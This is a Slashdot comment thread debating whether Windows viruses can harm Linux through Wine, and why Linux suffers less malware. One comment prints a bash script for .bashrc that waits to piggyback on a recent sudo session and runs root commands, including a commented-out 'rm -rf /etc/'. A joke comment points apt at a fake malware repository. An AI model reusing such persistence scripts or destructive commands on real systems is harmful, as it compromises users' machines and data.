Slashdot Mirror


Now Linux Can Get Viruses, Via Wine

fsufitch writes "Wine has advanced enough to make Linux not immune to Windows viruses. However, just like many Wine applications, it takes a bit of effort to get the program off the ground. Also, just like some Windows programs running via Wine, not all features may work — in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

22 of 343 comments (clear)

  1. Re:marketshare by sakdoctor · · Score: 5, Insightful

    But none of us really want a locked down OS

    WTF?
    Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing, would have been an order of magnitude less.

  2. Linux's distribution model helps though by brunes69 · · Score: 5, Insightful

    The way Linux software is distributed, makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe, 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.

    The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.

    1. Re:Linux's distribution model helps though by buchner.johannes · · Score: 4, Insightful

      You, and the majority of Linux users are delusional. You think malware is only executables. A glitch in any software package -- e.g. Firefox or OpenOffice -- would be enough to add a bash script to .bashrc (or replace the file). This can download and start all the software it wants, unless you set the /home partition noexec.
      Another attack method would be to append a script to the GNOME startup applications.

      Consider appending the following script to .bashrc (no one ever looks in there). Next time you go into your shell and do "sudo su - " or something similar, the script has root privileges (if you use sudo timeouts or no sudo password).
      #!/bin/bash

      MAXAGE=100

      while sleep 10; do

              pgrep -f -U 0 -P $PPID,$$ && {
                      # echo parent has a root owned child process
                      id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
                      # wait $id
                      age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y')))
                      if [ "$age" -lt "$MAXAGE" ]; then
                              # echo the child is young
                              # evil code here
                              sudo touch /root/you_were_hacked
                              # sudo rm -rf /etc/
                      fi
              }
      done &

      With 10+ scripting languages on the average Linux install, the attacker has plenty of choices. Linux is only safer if you use a hardened kernel, SELinux, noexec partitions and read-only binary partitions. Crackers are already laughing about the upcoming, unworried lusers that think their OS is invulnerable.

      --
      NB: The message above might reflect my opinion right now, but not necessarily tomorrow or next year.
  3. Just waiting for this e-mail by fluch · · Score: 4, Funny

    This is a lonesome linux virus. Please add

    deb http://malware.server.ru/debian experimental non-free

    to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.

    1. Re:Just waiting for this e-mail by sakdoctor · · Score: 4, Funny

      non-free?

      I only install FLOSS malware.

    2. Re:Just waiting for this e-mail by Anonymous Coward · · Score: 4, Funny

      Me too, I won't compromise my freedom just to be part of a botnet.

      Free alternative: http://www.gnu.org/fun/jokes/evilmalware.html

  4. Linux on a bender by Anonymous Coward · · Score: 5, Funny

    What do you expect when Linux gets drunk on Wine and wakes up with Windows it's bound to have caught something.

  5. That's the problem with Wine... by Interoperable · · Score: 4, Funny

    I always have to configure the programs so much before they run. It really defeats the purpose of a virus if I have to configure it so much first. Once Linux can run Windows viruses with a one-very-poorly-chosen-click install process I might make the switch. Besides, I can just run my FOSS software under Windows and still have access to all of the proprietary viruses that are only made for windows.

    --
    So if this is the future...where's my jet pack?
  6. Look to Apple users using VM by Ilgaz · · Score: 4, Interesting

    If you look deeper to Apple users virtual machines (Sun Virtual Box etc.) , lots of them doesn't bother to install some free AV, a basic one saying "it is virtual anyway". When you talk about how evil things can be done while their virtual machine up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.

    If you have trouble convincing such people, just use plain logic: It can even run some games let alone a worm/trojan/virus.

    It is not in the culture you know...

  7. Re:marketshare by Anonymous Coward · · Score: 5, Insightful

    To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.

    What makes most machines insecure is the users, and since a server normally has only 1 very tech-saavy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.

    Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.

    To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).

  8. Experiments by Aquaseafoam · · Score: 4, Informative

    I work as a sysadmin at a company making a slow switchover to Linux, and I've experimented with this a bit. You can greatly, greatly limit the damage any virus can cause through wine by unmapping it's Z drive from the wine configuration menu. By default, wine maps / to Z. I can see why they did this, (wine can only run applications within a mapped drive) but it likely needs to be undone across the board. The best alternative would be to create a unhidden wine folder in the user's home directory and map that in wine. If Z is left mapped to /, then a windows virus can run rampant all throughout your system.

    --
    09-F9-11-02-9D-74-E3-5B-D8-41-56-C5-63-56-88-C0
    1. Re:Experiments by TheRaven64 · · Score: 5, Informative

      A virus that is Linux-aware can escape from a WINE sandbox like this very easily. WINE handles Windows library calls, but it can not intercept system calls. If you put a Linux system call number into eax and issue interrupt 80h then you get a Linux system call, irrespective of whether it's a programme running with WINE or a native Linux program. Remember, WINE is not an emulator, it is just a loader and a set of libraries. It doesn't provide any sandboxing. WINE even provides a mechanism for allowing programs to detect if they are running under WINE, so if you can persuade a Linux user to run a program under WINE (or infect another program running under WINE) then you can do anything that the user can do. Unless, of course, you combine WINE with SELinux or some other real sandboxing mechanism.

      --
      I am TheRaven on Soylent News
  9. Windows virus needs help to limp onto WINE by AliasMarlowe · · Score: 4, Insightful

    So WINE can get a virus intended for Windows, if you jump through some hoops to help the virus along. Color me unworried.

    What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.

    TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.

    --
    Those who can make you believe absurdities can make you commit atrocities. - Voltaire
    1. Re:Windows virus needs help to limp onto WINE by Bert64 · · Score: 5, Insightful

      The beauty of wine, is that you can configure multiple wine instances which are segregated from each other, so a virus infecting one won't affect another... Also, since wine is a userland program which is only invoked at the user's request, any malware shouldn't be able to make itself load at boot.

      Incidentally, small desktop marketshare is not the only reason, windows has traditionally been more susceptible to viruses due to various design decisions which don't apply to linux, various factors like hiding of file extensions, users being admin by default, files being executable purely based on their filename (linux users have to chmod something first), and the basic fact that windows has its origins in a single user gui addon for dos which had no concept of security whatsoever (yes i know nt does, but they grafted the old 9x interface and apis on top, which fundamentally weakened the security model inherent in nt).

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
    2. Re:Windows virus needs help to limp onto WINE by hairyfeet · · Score: 5, Funny

      You want to know why Linux don't get viruses? You don't get the "Velma" users, that's why. I have a customer we have nicknamed the "walking disaster area" because she will click on ANYTHING that pretends to be a screensaver or comes from one of her friends email addresses, I don't care if the antivirus tries to throw itself between her and the .exe. Just as I had a customer that you could send him ANYTHING with the word 'lesbian" in it, and he would do what? yep, he would run it. .Exe, .VBS, you name it, all it had to do was have lesbian somewhere in the title.

      So don't worry, you Linux guys get the "Velma" users I'm quite sure your good friends in Nigeria, the RBN, and China will be cooking up "happy_screensaver.sh" and "hot_lesbians_vid.sh" and the clueless will happily run it and spread bugs like the clap. Trust me, as a PC repair guy for more years than I care to count a good 999/1000 Windows bugs can be traced back to PEBKAC.

      --
      ACs don't waste your time replying, your posts are never seen by me.
  10. not just marketshare by RiotingPacifist · · Score: 4, Interesting

    Ubuntu 9.10 will start sandboxing desktop programs (starts with xpdf i think), other distros do already/will follow. I think that sandboxing can (and if required will) criple malwares abilities (e.g can't listen on network ports, can't insert itself to bootsequence, can't touch chrome tabs that are connected to https sites) leaving them unable to do most malwarey things without permission and can work like an AV that is designed right (e.g warn users that they are about to do something very stupid, only when they are not everytime they run a 3rd party app/widget, without having to scan binaries)

    --
    IranAir Flight 655 never forget!
  11. Re:marketshare by bhtooefr · · Score: 5, Insightful

    The problem is, for a home computer, you are your own sysadmin.

    And then the dancing bunnies problem comes into play.

    User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
    Malware: *tries to install*
    OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
    User: *enters root password*
    Malware: *infects system*
    OS: *pwned*
    User: *pwned*

  12. Re:marketshare by zmollusc · · Score: 5, Funny

    If I was teh evil malwares writer, I would target OSX as its users have piles of cash. The trick would be to make your pop-up so beautifully coloured, shaded, animated and raytraced that the style-obsessed mac user would fill in his credit card details immediately.

    --
    They whose government reduces their essential liberties for temporary security, receive neither liberty nor security.
  13. Re:Just get hacked, it is easier anyway by argent · · Score: 4, Insightful

    Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.

    A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.

    The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.

    Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.

    These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.

    I think Apple is about to learn a real lesson with the iPhone being hacked constantly.

    If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.

  14. Re:marketshare by Nerdfest · · Score: 4, Funny

    Yeah ... but dancing bunnies .... it is a tough call.

  15. Re:marketshare by Runaway1956 · · Score: 4, Insightful

    "But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing"

    I keep hearing that. Everyone says it so it must be true. But, I'm mindful of the fact that only a handful of viruses have EVER been written for Linux, and that the User can't infect the underlying system. It takes Root access to do so, something that is only now beginning to be true for Windows.

    It seems that Windows is improving it's security model - but they still haven't caught up with Linux, despite what the fanboys might have to say. Unlike XP, it has always been possible to lock the User down pretty tightly, but still allow User to play any game on the system. More, it has almost always been possible to allow a User to install his games and applications in User Space. That isn't possible with Windows, even with Win 7. When I can create a dozen users, each of whom allows serious infections WITHIN HIS OWN ACCOUNT, but the Admin account remains untouched and unharmed, THEN Windows will be well on the road to having a meaningful security model.

    Whatever - I'll believe the basic premise that Linux would be just as vulnerable as Windows if it had market share when I see it. To me, it seems the structure and the philosophy of Linux contradicts what common "wisdom" says.

    --
    "Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
  16. Re:marketshare by evilviper · · Score: 4, Insightful

    As long as the OS isn't completely locked down from the user, there will be malware.

    If you operate as a non-privileged user, and there aren't gaping local root exploits, malware is pretty damn toothless.

    Sure, it could still send out some e-mails, record your keystrokes, etc., but it will show up in `ps` just like any other process, and it will have to launch itself from a few standard few locations available, where it will be easy to find, and stop from running.

    So, yes, Linux could have malware, but it would be the minor nuisance type, rather than the "everyone's infected, it's impossible to remove, and the internet is being brought to its knees" type.

    Additionally, the problem with Linux viruses is that people get their software from a central repository, with cryptographic checksums and the like. The world would be very different if Windows users got all their software through WindowsUpdate, instead of constantly downloading crap from random websites.

    --
    Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant